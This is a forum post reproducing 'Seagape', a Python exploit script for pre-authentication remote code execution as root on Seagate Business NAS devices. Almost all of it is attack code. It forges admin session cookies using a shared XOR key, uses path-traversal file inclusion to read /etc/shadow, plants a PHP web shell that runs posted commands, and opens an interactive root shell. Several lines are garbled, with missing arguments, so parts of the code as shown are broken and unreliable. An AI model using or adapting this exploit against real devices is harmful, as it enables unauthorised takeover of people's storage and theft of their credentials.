Aerosol Posted March 1, 2015 Report Posted March 1, 2015 #!/usr/bin/env python## Seagape# =======# Seagate Business NAS pre-authentication remote code execution# exploit as root user.## by OJ Reeves (@TheColonial) - for full details please see# Usage# =====# <ip> <port> [-c [ua]]## - ip : ip or host name of the target NAS# - port : port of the admin web ui# - -c : (optional) create a cookie which will give admin access.# Not specifying this flag results in webshell installation.# - ua : (optional) the user agent used by the browser for the# admin session (UA must match the target browser).# Default value is listed below## Example# =======# Install and interact with the web shell:# 80## Create admin cookie# 80 -cimport base64import hashlibimport itertoolsimport osimport reimport socketimport sysimport urllibimport urllib2import uuidimport xml.sax.saxutilsif len(sys.argv) < 3: print "Usage: {0} <ip> <port> [-c [user agent]]".format(sys.argv[0]) sys.exit(1)# Every Seagate nas has the same XOR key. Great.XOR_KEY = '0f0a000d02011f0248000d290d0b0b0e03010e07'# This is the User agent we'll use for most of the requestsDEFAULT_UA = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10'# This is the description we're going to be reading fromLFI_FILE = '/etc/devicedesc'# the base globals that will hold our statehost = sys.argv[1]port = int(sys.argv[2])cis = ''hostname = ''webshell = str(uuid.uuid1()) + ".php"def chunks(s, n): for i in xrange(0, len(s), n): yield s[i:i + n]def forward_interleave(a, : return ''.join(itertools.chain(*zip(itertools.cycle(a), ))def xor(s, k): return ''.join(chr(ord(a) ^ ord() for a, b in itertools.izip(s, itertools.cycle(k)))def sha1(s): return hashlib.sha1(s).hexdigest()def decode(s): f = xor(s, XOR_KEY) return ''.join(chr(ord(a) ^ ord() for a, b in chunks(f, 2))def encode(s): s = forward_interleave(sha1(s), s) s = ''.join(a + chr(ord(a) ^ ord() for a, b in chunks(s, 2)) return xor(s, XOR_KEY)def make_request(uri = "/", ci_session = None, headers = None, post_data = None): method = 'GET' if not headers: headers = {} headers['Host'] = host if 'User-Agent' not in headers: headers['User-Agent'] = DEFAULT_UA if 'Accept' not in headers: headers['Accept'] = 'text/html' if post_data: method = 'POST' post_data = urllib.urlencode(post_data) headers['Content-Type'] = 'application/x-www-form-urlencoded' if ci_session: ci_session = urllib.quote(base64.b64encode(encode(ci_session))) headers['Cookie'] = 'ci_session={0}'.format(ci_session) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) http = "" http += "{0} {1} HTTP/1.1\r\n".format(method, uri) for h in headers: http += "{0}: {1}\r\n".format(h, headers[h]) if post_data: http += "Content-Length: {0}\r\n".format(len(post_data)) http += "\r\n" if post_data: http += post_data s.send(http) result = "" while True: data = s.recv(1024) if not data: break result += data s.close() return resultdef get_ci_session(): resp = make_request() for l in resp.split("\r\n"): m = re.findall("Set-Cookie: ([a-zA-Z0-9_\-]+)=([a-zA-Z0-9\+%=/]+);", l) for name, value in m: if name == 'ci_session' and len(value) > 40: return decode(base64.b64decode(urllib.unquote(value))) print "Unable to establish session with {0}".format(host) sys.exit(1)def add_string(ci_session, key, value): prefix = 's:{0}:"{1}";s:'.format(len(key), key) if prefix in ci_session: ci_session = re.sub(r'{0}\d+:"[^"]*"'.format(prefix), '{0}{1}:"{2}"'.format(prefix, len(value), value), ci_session) else: # doesn't exist, so we need to add it to the start and the end. count = int(ci_session.split(':')[1]) + 1 ci_session = re.sub(r'a:\d+(.*)}$', r'a:{0}\1{1}{2}:"{3}";}}'.format(count, prefix, len(value), value), ci_session) return ci_sessiondef set_admin(ci_session): return add_string(ci_session, "is_admin", "yes")def set_language(ci_session, lang): return add_string(ci_session, "language", lang)def include_file(ci_session, file_path): if file_path[0] == '/': file_path = '../../../../../..' + file_path return set_language(ci_session, file_path + "\x00")def read_file(file_path, post_data = None): resp = make_request(ci_session = include_file(cis, file_path), headers = {}, post_data = post_data) return respdef hashdump(): shadow = read_file('/etc/shadow') for l in shadow.split("\n"): if l and ':!:' not in l and ':' not in l: parts = l.split(':') print "{0}:{1}".format(parts[0], parts[1])def cmd(command): headers = { 'Content-Type' : 'application/x-www-form-urlencoded', 'Accept' : '*/*', 'User-Agent' : DEFAULT_UA } post_data = urllib.urlencode({'c' : command}) headers['Content-Type'] = 'application/x-www-form-urlencoded' ci_session = urllib.quote(base64.b64encode(encode(cis))) headers['Cookie'] = 'ci_session={0}'.format(ci_session) url = 'http://{0}:{1}/{2}'.format(host, port, webshell) req = urllib2.Request(url, headers = headers, data = post_data) return urllib2.urlopen(req).read()def shell(): running = True while running: c = raw_input("Shell ({0}) $ ".format(post_id)) if c != 'quit' and c != 'exit': cmd(c) else: running = Falsedef show_admin_cookie(user_agent): ci_session = add_string(cis, 'is_admin', 'yes') ci_session = add_string(ci_session, 'username', 'admin') ci_session = add_string(ci_session, 'user_agent', user_agent) ci_session = urllib.quote(base64.b64encode(encode(ci_session))) print "Session cookies are bound to the browser's user agent." print "Using user agent: " + user_agent print "ci_session=" + ci_sessiondef show_version(): print "Firmware Version: {0}".format(get_firmware_version())def show_cookie(): print cisdef show_help(): print "" print "Seagape v1.0 -- Interactive Seagate NAS Webshell" print " - OJ Reeves (@TheColonial) -" print " -" print "===========================================================================" print "version - Print the current firmware version to screen." print "dumpcookie - Print the current cookie to screen." print "admincookie <ua> - Create an admin login cookie (ua == user agent string)." print " Add to your browser and access ANY NAS box as admin." print "help - Show this help." print "exit / quit - Run for the hills." print "<anything else> - Execute the command on the server." print ""def execute(user_input): result = True parts = user_input.split(' ') c = parts[0] if c == 'admincookie': ua = DEFAULT_UA if len(parts) > 1: ua = ' '.join(parts[1:]) show_admin_cookie(ua) elif c == 'dumpcookie': show_cookie() elif c == 'version': show_version() elif c == 'help': show_help() elif c == 'quit' or c == 'exit': remove_shell() result = False else: print cmd(user_input) return resultdef get_firmware_version(): resp = make_request("/index.php/mv_system/get_firmware?_=1413463189043", ci_session = acis) return resp.replace("\r", "").replace("\n", "").split("version")[1][1:-2]def install_shell(): resp = make_request("/index.php/mv_system/get_general_setup?_=1413463189043", ci_session = acis) existing_setup = '' for l in resp.split("\r\n"): if 'general_setup' in l: existing_setup = l break # generate the shell and its installer exec_post = base64.b64encode("<?php if(isset($_POST['c'])&&!empty($_POST['c'])){system($_POST['c']);} ?>") installer = '<?php file_put_contents(\'{0}\', base64_decode(\'{1}\')); ?>'.format(webshell, exec_post) write_php = xml.sax.saxutils.quoteattr(installer)[1:-1] start = existing_setup.index('" description="') + 15 end = existing_setup.index('"', start) updated_setup = existing_setup[0:start] + write_php + existing_setup[end:] # write the shell to the description resp = make_request("/index.php/mv_system/set_general_setup?_=1413463189043", ci_session = acis, headers = { }, post_data = { 'general_setup' : updated_setup }) # invoke the installer read_file(LFI_FILE) # remove the installer resp = make_request("/index.php/mv_system/set_general_setup?_=1413463189043", ci_session = acis, headers = { }, post_data = { 'general_setup' : existing_setup })def remove_shell(): return cmd('rm -f {0}'.format(webshell))print "Establishing session with {0} ...".format(host)cis = get_ci_session()if len(sys.argv) >= 4 and sys.argv[3] == '-c': ua = DEFAULT_UA if len(sys.argv) > 4: ua = sys.argv[4] show_admin_cookie(ua)else: print "Configuring administrative access ..." acis = add_string(cis, 'is_admin', 'yes') acis = add_string(acis, 'username', 'admin') print "Installing web shell (takes a while) ..." install_shell() print "Extracting id and hostname ..." identity = cmd('whoami').strip() hostname = cmd('cat /etc/hostname').strip() show_help() running = True while running: try: user_input = raw_input("Seagape ({0}@{1})> ".format(identity, hostname)) running = execute(user_input) except: print "Something went wrong. Try again."Source Quote